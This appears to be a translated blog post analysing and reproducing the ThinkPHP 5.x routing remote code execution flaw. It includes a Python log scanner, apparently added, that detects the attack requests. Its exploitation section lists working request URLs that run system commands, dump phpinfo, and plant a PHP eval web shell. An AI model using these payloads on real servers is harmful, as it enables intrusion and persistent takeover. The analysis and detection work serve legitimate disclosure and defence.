
ThinkPHP 5.x remote command execution vulnerability analysis and reproduction

Aug 20, 2019 pm 02:09 PM
thinkphp

0x00 Foreword

ThinkPHP officially released an important security update on December 9, 2018, which fixed a serious remote code execution vulnerability. Because the framework does not sufficiently check the controller name, a getshell vulnerability is possible when forced routing is not turned on. The affected versions include 5.0 and 5.1. It is recommended to update to the latest version as soon as possible.

0x01 Scope of Impact

5.x

0x02 Vulnerability Analysis

Thinkphp v5.0.x patch address: https://github.com/top-think/framework/com...

Thinkphp v5.1.x patch address: https://github.com/top-think/framework/com...

The patch filters the controller part of the routing information, which shows that the problem occurs during route dispatch (scheduling). Key code during scheduling:

Before the fix, the program did not filter the controller name, allowing an attacker to call any class method by introducing the \ symbol.

The $this->app->controller method instantiates the controller, and the methods of that instance are then called. Following the controller method:

It uses the parseModuleAndClass method to parse out $module and $class, and then instantiates $class.

In the parseModuleAndClass method, when $name starts with a backslash \, it is used directly as the class name. Taking advantage of the characteristics of the namespace, if you can control the $name here (that is, the controller part of the route), you can instantiate any class.

Next, let’s look back at the route parsing code. The route/dispatch/Url.php::parseUrl method calls route/Rule.php::parseUrlPath to parse the routing information in pathinfo.

The code is relatively simple: it just splits $url on / without any filtering.

The routing URL is obtained from Request::path().

Since var_pathinfo defaults to s, routing information can be passed through $_GET['s']. It can also be passed through pathinfo, but during testing, the \ in $_SERVER['pathinfo'] is replaced with / in the Windows environment. Combined with the previous analysis, a preliminary request takes the form index.php?s=index/\namespace\class/method, which instantiates the \namespace\class class and executes its method method.
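The routing behaviour analysed above can be turned into a log check. The following is an added example, not code from the article or from ThinkPHP: it extracts the routing string from the s parameter or from pathinfo, splits it on / as described, and flags requests whose controller segment is not a plain name. The function names, the allowlist pattern and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed allowlist for a controller name: a letter, then word characters or dots.
# It models the kind of filter the patch adds; it is not copied from the framework.
SAFE_CONTROLLER = re.compile(r"[A-Za-z][\w.]*", re.ASCII)

def route_from_request(target, var_pathinfo="s"):
    """Return the routing string the way the article describes: from ?s= if
    present, otherwise from the path that follows index.php."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    if var_pathinfo in query:
        return query[var_pathinfo][0]
    _, _, pathinfo = parts.path.partition("index.php")
    return pathinfo

def controller_segment(route):
    """Split module/controller/action on '/' with no other filtering."""
    segments = route.strip("/").split("/")
    return segments[1] if len(segments) > 1 else None

def is_suspicious(target):
    """True when the controller segment cannot be a plain controller name,
    for example because it contains the namespace separator '\\'."""
    controller = controller_segment(route_from_request(target))
    return controller is not None and not SAFE_CONTROLLER.fullmatch(controller)

def scan_access_log(lines):
    """Yield (client, target) for flagged requests in common-log-format lines."""
    request = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
    for line in lines:
        m = request.match(line)
        if m and is_suspicious(m.group(2)):
            yield m.group(1), m.group(2)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Aug/2019:14:09:00 +0000] "GET /public/index.php?s=index/index/hello HTTP/1.1" 200 512',
    '192.0.2.66 - - [20/Aug/2019:14:09:05 +0000] "GET /public/index.php?s=index/\\namespace\\class/method HTTP/1.1" 200 97',
    '192.0.2.67 - - [20/Aug/2019:14:09:09 +0000] "GET /public/index.php?s=index/%5Cnamespace%5Cclass/method HTTP/1.1" 200 97',
    '192.0.2.11 - - [20/Aug/2019:14:09:12 +0000] "GET /public/index.php/index/blog/read?id=5 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, target in scan_access_log(SAMPLE_LOG):
        print(client, target)
```

The check decodes the query string before splitting, so a percent-encoded backslash (%5C) in the controller segment is flagged the same way as a literal one.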

0x03 Vulnerability Exploitation

Docker vulnerability environment source code: https://github.com/vulnspy/thinkphp-5.1.29

Local environment: thinkphp5.0.15 php5.6n apache2.0

http://www.thinkphp.cn/donate/download/id/...

1. Use the system function to execute remote commands

http://localhost:9096/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

2. Use the phpinfo function to write out the information of phpinfo ()

http://localhost:9096/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

3. Write shell:

http://localhost:9096/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php

or

http://localhost:9096/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php echo 'ok';?>